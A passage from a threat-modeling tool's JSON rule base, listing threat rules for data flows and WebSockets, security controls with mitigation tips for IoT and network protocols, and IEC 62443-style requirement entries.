3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"d59a4a10-780a-465b-86fa-292a07e7a89a","Name":"External entity is spoofed","Description":"Ext. entity passes input to process. E.g., process is confused by the identify of the ext. entity. (see Threat modeling - designing for security: Table 3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"d675c061-7af1-4e49-a503-0b512a85f9da","Name":"Process denies receiving data","Description":"Ext. entity passes input to process. E.g., process claims not to have received data. (see Threat modeling - designing for security: Table 3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"427f13f4-ce93-4344-b6fc-1178ea54199e","Name":"Process is spoofed","Description":"Ext. entity gets input from process. E.g., ext. entity is confused about the identify of the process. (see Threat modeling - designing for security: Table 3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"b8d4d723-fe3b-4288-87da-c73fc2412fc5","Name":"Message sniffing","Description":"You should strongly prefer the secure wss:// protocol over the insecure ws:// transport. Like HTTPS, WSS (WebSockets over SSL/TLS) is encrypted, thus protecting against man-in-the-middle attacks. A variety of attacks against WebSockets become impossible if the transport is secured.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"fa8d45ee-bfc7-47d7-9eed-4b38bc797336","Name":"Tunneling","Description":"It\u2019s relatively easy to tunnel arbitrary TCP services through a WebSocket. So you could, for example, tunnel a database connection directly through to the browser. This is very dangerous, however. Doing so would enable access to these services to an in-browser attacker in the case of a cross-site scripting attack, thus allowing an escalation of a XSS attack into a complete remote breach.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"db990108-a992-40e4-b2fc-d4dd00d42431","Name":"Missing client data validation","Description":"WebSocket connections are easily established outside of a browser, so you should assume that you need to deal with arbitrary data. Just as with any data coming from a client, you should carefully validate input before processing it.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"b48781b2-24a2-481b-b7c1-3390dbeeb973"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8cd86481-a82f-490d-8d62-2195981779e9","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"ac0e3170-0187-47e8-a2ed-6671cc24137e","Name":"Missing server data validation","Description":"You should apply equal suspicion to data returned from the server, as well. Always process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"92c3d3ef-aa2d-4920-978e-ff1755479308","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"7d0edcb5-7eff-490e-8d29-db68172ddd20","Name":"Missing authentication and authorization","Description":"The WebSocket protocol doesn\u2019t handle authorization or authentication. Practically, this means that a WebSocket opened from a page behind auth doesn\u2019t \u201cautomatically\u201d receive any sort of auth; you need to take steps to also secure the WebSocket connection.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"485ff476-0c99-41de-b90a-4fdd27730685","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cc7e24ac-cfc0-4cf8-a291-386735862947","Name":"Denial of service attack","Description":"WebSockets let an unlimited number of connections reach the server. This lets an attacker flood the server with a DOS attack. This greatly strains the server and exhausts the resources on that server. Then the website slows down greatly.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"341eaf3e-808c-45de-9445-6be3cc66777b","Name":"Access restriction for authorized users","Description":"Access could be restricted for authorized users if attackers use all available connections ","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","ComparisonType":"==","Value":true}}]},"Severity":2}],"controls":[{"ID":"99636fb9-9a42-48b5-8368-a935a11dc943","Name":"Disable debug access","Description":"","mitigatedAttackVectorIDs":["8a6476b9-7a5c-4306-bd43-db6fe32bbf66"],"MitigationTips":[{"Name":"Remove interface","Description":"Any interface used for administration or test purposes during development should be removed from a production device, disabled or made physically inaccessible.","LifeCycles":["I"]},{"Name":"Disable interface","Description":"All test access points on production units must be disabled or locked, for example by blowing on-chip fuses to disable JTAG.","LifeCycles":["P"]},{"Name":"Enable access control","Description":"If a production device must have an administration port, ensure it has effective access controls, e.g. strong credential management, restricted ports, secure protocols etc.","LifeCycles":["I"]}],"mitigatedThreatRuleIDs":["821594a6-02e5-4a15-9a72-9cca5b57ee92","7cfa63f6-262b-4da3-aa88-6478522b45c5"]},{"ID":"8febb6ed-da70-44ff-8d95-cf9a30d6b0ec","Name":"Device casing mitigations","Description":"","mitigatedAttackVectorIDs":[],"MitigationTips":[{"Name":"PCB design","Description":"Make the device circuitry physically inaccessible to tampering, e.g. epoxy chips to circuit board, resin encapsulation, hiding data and address lines under these components etc.","LifeCycles":["I"]},{"Name":"Protective casing","Description":"Provide secure protective casing and mounting options for deployment of devices in exposed locations.","LifeCycles":["C"]},{"Name":"Tamper evident packaging","Description":"To identify and deter access within the supply chain, consider making the device and packaging \u201ctamper evident\u201d.","LifeCycles":["C"]},{"Name":"Active masking","Description":"For high-security deployments, consider design measures such as active masking or shielding to protect against side-channel attacks.","LifeCycles":["C"]}],"mitigatedThreatRuleIDs":["a3c2f053-c8d6-4626-ae54-79f87ae171c3"]},{"ID":"c943341c-b65c-4801-8d8e-d83d047ac0b7","Name":"Secure boot","Description":"","mitigatedAttackVectorIDs":[],"MitigationTips":[],"mitigatedThreatRuleIDs":["11975f59-55e0-420f-9366-513175e9236e","61e37274-9751-4250-8a4d-6476edc8f732","1487298b-ff88-4e01-9a60-09b1eaf8a41f","10a258f6-49c0-435e-9a66-630039de0dc8","5d407978-73dc-45c9-8402-db692b42dae4"]},{"ID":"ea061d92-c31b-4644-8f5f-5093f513dd9d","Name":"Traffic data encryption","Description":"","mitigatedAttackVectorIDs":["e58fcbde-e429-4704-9f22-c00d187994bc","bb7358c1-e5b6-424f-962d-daab17345b63","001ba17c-0400-4369-912e-0ceda3ccd227"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Mutual authentication","Description":"Use strong mutual authentication to ensure the authenticity of both endpoints. ","LifeCycles":["C"]},{"Name":"Signed certificates","Description":"Validate the authenticity of public keys by their certificates. Validate the entire certificate chain. ","LifeCycles":["I"]},{"Name":"Use TLS","Description":"Use the latest version of TLS and include only strong cipher suits. ","LifeCycles":["I"]},{"Name":"Lightweight cryptography","Description":"In case TLS is not possible due to performance issues, choose an adequate lightweight cryptography algorithm.","LifeCycles":["I"]},{"Name":"Ensure integrity","Description":"If no sensitive data are transmitted and performance is a bottle neck, ensure at least the integrity of messages using a message authentication code (MAC).","LifeCycles":["I"]},{"Name":"Ensure replay protection","Description":"Ensure that it is not possible for a captured and resend package to be treated as legitimate.  ","LifeCycles":["I"]}]},{"ID":"8827b03b-475a-474f-baa1-7de740e244ba","Name":"Input validation","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html","mitigatedAttackVectorIDs":["d92ccd9c-3a24-4e07-a2ca-c1e9949bb386"],"mitigatedThreatRuleIDs":[],"MitigationTips":[]},{"ID":"9ed45808-7ffa-412a-ab29-84c0e738c8da","Name":"NV memory encryption","Description":"Encrypt the non-volatile memory","mitigatedAttackVectorIDs":["e851a284-6b41-41c9-9efd-dc8b01f788da"],"mitigatedThreatRuleIDs":[],"MitigationTips":[]},{"ID":"a5beea3e-c1e2-40ef-9056-8540c7f5557d","Name":"Certificate validation","Description":"","mitigatedAttackVectorIDs":["0b47795b-b42d-49d1-bf50-7f4889994fea","6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ed84da5f-3181-4be1-bef4-d911077b1910","b26fc3e4-7a38-4f00-acdb-ec78246d0b25"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Certificate pinning","Description":"https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning","LifeCycles":["I"]},{"Name":"Check expiration","Description":"","LifeCycles":["I"]},{"Name":"Check certificate chain","Description":"","LifeCycles":["I"]},{"Name":"Check revocation","Description":"","LifeCycles":["I"]},{"Name":"Check properties","Description":"Check all relevant certificate properties such as hostname","LifeCycles":["I"]}]},{"ID":"af734914-6fe1-4ace-8895-a004472c9d13","Name":"True random number generator","Description":"The generation of true random numbers is essential for many cryptographic operations. However, many pseudo-random number generators (PRNGs) are not cryptographically secure.","mitigatedAttackVectorIDs":["0ffd675d-d83c-4f74-8835-398e7f3930cb"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use hardware TRNG","Description":"Many modern microcontroller ship with a true random number generator (TRNG). As this entropy source may be slow, it may be necessary to combine the TRNG with a cryptographically secure PRNG (CSPRNG). ","LifeCycles":["C"]},{"Name":"Use CSPRNG","Description":"","LifeCycles":["I"]},{"Name":"Use different entropy sources","Description":"Try to collect entropy from different sources, e.g. network traffic, human interaction, etc. ","LifeCycles":["I"]},{"Name":"Test the entropy","Description":"Test the generated entropy according to NIST SP 800-90 and SP 800-22, for example.","LifeCycles":["I"]}]},{"ID":"34eb5948-314a-4a99-a782-c5ed7d26df01","Name":"Strong block cipher mode","Description":"Review the latest recommendations from organizations such as NIST.","mitigatedAttackVectorIDs":["a20d6e53-4426-4700-a04f-a4018bc7bfce"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use authenticated encryption","Description":"Modes for authenticated encryption (AE) ensure confidentiality as well as integrity. Plaintext data (e.g. in headers) can also be protected against manipulation when using a AE with associated data (AEAD). ","LifeCycles":["I"]}]},{"ID":"51afbfbf-f5f5-40f7-908f-5db63ed5e1ca","Name":"Use IV and Nonce only once","Description":"Use an initialization vector (IV) or nonce (number used only once) only once. ","mitigatedAttackVectorIDs":["680ceebd-357c-49d6-8bfd-390dc6c51dde"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Generate the IV using a CSPRNG","Description":"While it is legit to use a counter (1, 2, 3, ...), it is more practical to use a random number (generated by a cryptographically secure pseudo random number generator, CSPRNG). As IVs often have 96 bits or more, it is improbable that a number is generated twice with a CSPRNG","LifeCycles":["I"]}]},{"ID":"43834e91-cb84-407e-9819-ffbc58b405a0","Name":"Secure password storage","Description":"","mitigatedAttackVectorIDs":["f0ef09ed-0cde-4b12-beb6-f1640132f3e6","0e3c0e3e-1587-46f8-93ea-e9091dff5958","05e04798-41ce-4919-a92b-264f7e985de2"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use hash with salt","Description":"Do not store the password in plain text. Store the output of a cryptographic hash function. Before hashing the password, combine it with a unique, random salt (random bit string that can be treated as public) --\x3e store hash(password | salt), for example. ","LifeCycles":["I"]},{"Name":"Use password hashing algorithm","Description":"Not all cryptographic hash algorithms are suitable for hashing, as they are too fast, e.g. SHA2. Use a password hashing algorithm such as bcrypt or argon2.   ","LifeCycles":["I"]}]},{"ID":"a23f9f78-27a6-4a21-8c48-29a2afd48830","Name":"Logging","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html","mitigatedAttackVectorIDs":["71f761e4-8149-4a88-92fd-35f9d99cc0ef","afd4bceb-31b0-41cd-9eae-02d2eba6b41c"],"mitigatedThreatRuleIDs":["b9caf305-7c53-48c9-beef-2fb2a96cc5b0","778eb19f-8f36-4ce5-aa48-70429386b113","c4df07d3-101f-492e-9f90-70d916f7ed43","b0d13562-1629-4724-bb67-f910157ed1c9","b4c216c0-ccab-4a4d-a156-1b4979dc2aec","c6ac1dcf-ff18-4810-ba64-10aaaf44c135","f51350c5-5401-4276-a8e5-14eba86bc070","e145ffad-ec47-4251-9fa4-1475133db2ff"],"MitigationTips":[{"Name":"Separate storage","Description":"Store logs in a separate partition or memory chip.","LifeCycles":["C"]},{"Name":"Central log backup","Description":"Send logs to a central backup storage","LifeCycles":["C"]},{"Name":"Restrict access","Description":"Restrict access to log files","LifeCycles":["I"]},{"Name":"Cryptographically protect logs","Description":"Ensure confidentiality, integrity, and authenticity of log files","LifeCycles":["I"]},{"Name":"Do\'s","Description":"Log: login, logout, authentication attempt, inactivity, password change, configuration change, privilege change, failures and errors, network activity, ....","LifeCycles":["I"]},{"Name":"Don\'ts","Description":"Don\'t log: passwords\\nAvoid: personal identifiable information (PII)","LifeCycles":["I"]},{"Name":"Evaluate logs","Description":"Monitor and evaluate the logs files for anomalies","LifeCycles":["O"]},{"Name":"Ensure availability","Description":"Attackers may attack log files in order to exhaust disk space or to overwrite them. Another goal could be to decrease the application performance. ","LifeCycles":["O"]}]},{"ID":"6149966a-4422-4b32-ac28-88a2ded07354","Name":"Cloud service recovery","Description":"","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["b05b7085-3952-4f0d-bb85-7c380eb32f92"],"MitigationTips":[{"Name":"Adopt a geographically redudant configuration","Description":"","LifeCycles":["O"]}]},{"ID":"113386c4-73e2-4e37-a390-83c3ef939633","Name":"OPC UA secure configuration","Description":"See Practical Security Recommendations for building OPC UA Applications by OPC Fundation","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","7f6ca653-a703-480c-b5d8-d82243171994","289c20cd-ea84-4375-8453-b045b94e1dc6","3a44327d-24d1-4c53-a3ea-7d891fb86f47"],"MitigationTips":[{"Name":"User authentication","Description":"The possibility of logging in with the identifier \u2018anonymous\u2019 should be used only for accessing non-critical UA server resources as it does not provide any protection","LifeCycles":["C","I"]},{"Name":"Security mode","Description":" The SecurityMode should be \u2018Sign\u2019 or \u2018SignAndEncrypt\u2019","LifeCycles":["I"]},{"Name":"Cryptographic algorithms","Description":"At a minimum, the SecurityPolicy \u2018Basic256Sha256\u2019 should be chosen","LifeCycles":["I"]},{"Name":"Use certificates","Description":"Don\u2019t accept connections which do not provide trusted certificates","LifeCycles":["I"]},{"Name":"Certificate and private key storage","Description":"Never store private keys or the corresponding certificate files (.pfx/p12) on an unencrypted file system","LifeCycles":["I"]},{"Name":" Managing and maintaining certificates","Description":"Use certificate trust lists and certificate revocation lists to manage valid certificates","LifeCycles":["I"]}]},{"ID":"6986a3d3-c10f-4ffb-a348-fafe9c8c9150","Name":"MQTT secure configuration","Description":"","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["a89ed38a-c36b-445b-a8c2-89e7289cdb9e","104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59"],"MitigationTips":[{"Name":"Define access control lists for topcis","Description":"","LifeCycles":["C","I"]},{"Name":"Use MQTT over TLS","Description":"Use MQTT over TLS on port 8883","LifeCycles":["I"]},{"Name":"Use X.509 client certificates","Description":"","LifeCycles":["I"]},{"Name":"Define maximum message size","Description":"MQTT defines a maximum message size of 256MB. In most MQTT deployment scenarios, messages are often smaller than a kilobyte. If you are familiar with your usage scenario and you know the maximum message size that can occur, it makes sense to decrease the maximum allowed message size to that limit. If no limit is set, it is possible for malicious MQTT clients to send large messages (which can result in excessive memory consumption and unneeded bandwidth usage).","LifeCycles":["I"]}]},{"ID":"76ed8c24-b89e-4eb1-9d09-a97548729ba5","Name":"DoS protection","Description":"DoS depends on the used network interfaces, protocols and operating system","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["7b825bd7-222e-476f-bf22-85fe2e50eb6c"],"MitigationTips":[{"Name":"Use challenges","Description":"Use challenges like CAPTCHA to filter requests by bots","LifeCycles":["I"]},{"Name":"Use a web application firewall","Description":"","LifeCycles":["I"]},{"Name":"Use intrusion detection/prevention system","Description":"Use a intrusion detection/prevention such as Fail2ban","LifeCycles":["I"]}]},{"ID":"bb8d07ff-b13e-437c-9483-bee76a98bb84","Name":"Anti-rollback protection","Description":"The goal of anti-rollback protection is to prevent downgrading of the device to an older version of its software, which has been deprecated due to security concerns.\\n\\nhttps://developer.trustedfirmware.org/w/tf_m/design/trusted_boot/rollback_protection/","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["c6535534-7656-4819-93fe-19d9a78a9390"],"MitigationTips":[{"Name":"Security counter","Description":"Implement an additional security counter, independently from the firmware version, to ensure anti-rollback protection. This allows downgrades to a version without bugs, for example, but prevents downgrades to vulnerable ones.  ","LifeCycles":["C","I","U"]}]},{"ID":"fd548c36-f9ae-4c1e-8244-477c7d121c36","Name":"WebSocket security","Description":"https://devcenter.heroku.com/articles/websocket-security\\nhttps://brightsec.com/blog/websocket-security-top-vulnerabilities/#vulnerability-to-input-data","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["b8d4d723-fe3b-4288-87da-c73fc2412fc5","fa8d45ee-bfc7-47d7-9eed-4b38bc797336","db990108-a992-40e4-b2fc-d4dd00d42431","ac0e3170-0187-47e8-a2ed-6671cc24137e","7d0edcb5-7eff-490e-8d29-db68172ddd20","cc7e24ac-cfc0-4cf8-a291-386735862947"],"MitigationTips":[{"Name":"Avoid tunneling","Description":"Tunneling arbitrary TCP services via a WebSocket is easy. This is a risk that needs to be prevented. The best way to avoid this issue? Just avoid tunneling whenever possible.","LifeCycles":["C","I"]},{"Name":"Use secure wss://","Description":"","LifeCycles":["I"]},{"Name":"Validate client input","Description":"Carefully validate input before processing it","LifeCycles":["I"]},{"Name":"Validate server data","Description":"lways process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","LifeCycles":["I"]},{"Name":"Authentication / authorization","Description":"https://devcenter.heroku.com/articles/websocket-security#authentication-authorization\\nImplement a ticket-based authentication","LifeCycles":["I"]},{"Name":"Limit rate","Description":"Rate limiting is an important way to prevent abuse of your web application or web service. It can protect against bad bots, scraping attacks, and small-scale denial of service (DoS) attacks. In some cases, a malfunctioning client can result in an accidental DoS attack.","LifeCycles":["I"]},{"Name":"Use origin header","Description":"The WebSocket standard defines an Origin header field, which web browsers set to the URL that originates a WebSocket request. This can be used to differentiate between WebSocket connections from different hosts, or between those made from a browser and some other kind of network client.","LifeCycles":["I"]}]}],"controlGroups":[{"ID":"6dd5db7a-e54f-4e6f-858a-33449024cf88","Name":"Controls","Description":"","controlGroupIDs":["c324cdd7-8c3e-4d10-a91e-202a725430df","4df9ab6b-eb2f-4fc7-8bd7-8b6c2d03e922","627ed2f3-d2af-4f25-925b-2e93a9578a93","b6aceef6-08e1-4b2f-83a7-32c2bc736962","10c43f72-7e1c-4055-b8e8-321d17a0109e","3103fa1a-00eb-4361-864d-7f129333db08"],"controlIDs":[]},{"ID":"c324cdd7-8c3e-4d10-a91e-202a725430df","Name":"Physical Security","Description":"https://www.iotsecurityfoundation.org/wp-content/uploads/2019/12/Best-Practice-Guides-Release-2_Digitalv3.pdf","controlGroupIDs":[],"controlIDs":["99636fb9-9a42-48b5-8368-a935a11dc943","8febb6ed-da70-44ff-8d95-cf9a30d6b0ec"]},{"ID":"4df9ab6b-eb2f-4fc7-8bd7-8b6c2d03e922","Name":"Firmware Security","Description":"","controlGroupIDs":[],"controlIDs":["c943341c-b65c-4801-8d8e-d83d047ac0b7","9ed45808-7ffa-412a-ab29-84c0e738c8da","bb8d07ff-b13e-437c-9483-bee76a98bb84"]},{"ID":"627ed2f3-d2af-4f25-925b-2e93a9578a93","Name":"Network Security","Description":"","controlGroupIDs":[],"controlIDs":["ea061d92-c31b-4644-8f5f-5093f513dd9d","113386c4-73e2-4e37-a390-83c3ef939633","6986a3d3-c10f-4ffb-a348-fafe9c8c9150","76ed8c24-b89e-4eb1-9d09-a97548729ba5","fd548c36-f9ae-4c1e-8244-477c7d121c36"]},{"ID":"b6aceef6-08e1-4b2f-83a7-32c2bc736962","Name":"Application Security","Description":"","controlGroupIDs":[],"controlIDs":["8827b03b-475a-474f-baa1-7de740e244ba","a5beea3e-c1e2-40ef-9056-8540c7f5557d","a23f9f78-27a6-4a21-8c48-29a2afd48830"]},{"ID":"10c43f72-7e1c-4055-b8e8-321d17a0109e","Name":"Cryptography Mitigations","Description":"","controlGroupIDs":[],"controlIDs":["af734914-6fe1-4ace-8895-a004472c9d13","34eb5948-314a-4a99-a782-c5ed7d26df01","51afbfbf-f5f5-40f7-908f-5db63ed5e1ca","43834e91-cb84-407e-9819-ffbc58b405a0"]},{"ID":"3103fa1a-00eb-4361-864d-7f129333db08","Name":"Recovery","Description":"","controlGroupIDs":[],"controlIDs":["6149966a-4422-4b32-ac28-88a2ded07354"]}],"requirementTypes":[{"ID":"b008aede-3518-44f3-8cc2-7e92b68e0329","Name":"CR-1-1 Human user identification and authentication","Description":" ","subReqTypeIDs":["6dbaec8c-55cd-402e-9f9b-8089ad5d8e88","91a52e70-60f4-430c-b2f8-292e80931d70"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"6dbaec8c-55cd-402e-9f9b-8089ad5d8e88","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":true}},"NeedsReview":false,"RuleType":1}},{"ID":"91a52e70-60f4-430c-b2f8-292e80931d70","Name":"RE-2 Multifactor authentication for all interfaces","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"88763e20-7878-4525-81d8-c4d09b867042","ComparisonType":"==","Value":true}},"NeedsReview":true}},{"ID":"d47f441d-e3bf-461d-b724-47a90c19bc89","Name":"CR-1-2 Software process and device identification and authentication","Description":"","subReqTypeIDs":["3480145a-7767-48e8-a55c-09514771d17f"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"3480145a-7767-48e8-a55c-09514771d17f","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"83a019dd-d28b-4f3d-bf48-e254d2031445","Name":"CR-1-3 Account management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"b7bcf087-c925-4eec-9a11-e042250afbf1","Name":"CR-1-4 Identifier management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"f28381c7-5c24-4fd3-b75e-03fbebe03857","Name":"CR-1-5 Authenticator management","Description":"","subReqTypeIDs":["afa6717a-657d-462f-be28-04fe00231224"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"afa6717a-657d-462f-be28-04fe00231224","Name":"RE-1 Hardware security for authenticators","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"bd31bc1e-43ed-48f2-80ae-885680bcd378","Name":"CR-1-6 Wireless access management","Description":"","subReqTypeIDs":["cb2f2e32-bd57-4fed-8c04-9efd325ecc08"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"cb2f2e32-bd57-4fed-8c04-9efd325ecc08","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"40670f38-5fd9-47a3-994b-41a271a71694","Name":"CR-1-7 Strength of password-based 